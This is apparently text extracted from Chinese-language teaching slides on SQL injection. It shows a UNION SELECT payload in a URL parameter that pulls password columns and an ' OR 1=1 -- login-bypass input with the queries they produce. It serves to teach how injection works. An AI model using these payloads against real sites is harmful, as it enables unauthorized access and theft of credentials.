17. 三 . 漏洞利用 --SQL 注入场景 1 Web Server DBMS http://web.com/? id=6329 … . SELECT * from news where id = 6329 … .
18. Web Server DBMS http://web.com/? id=6329+ union+select+id,pwd,0+from ... … . SELECT * from news where id = 6329 union select id,pwd,0 from… … . 三 . 漏洞利用 --SQL 注入场景 1
19.
20. 未预料到的结果…… Username: ' OR 1=1 -- Password: 1 SELECT COUNT(*) FROM Users WHERE username= ' OR 1=1 -- ' and password= ' 1 ' /login.asp 攻击者 登录成功! 三 . 漏洞利用 --SQL 注入场景 2 Found 5 result If Count(*) >0 OK Else Disconnect UserName PassWord Contrast Database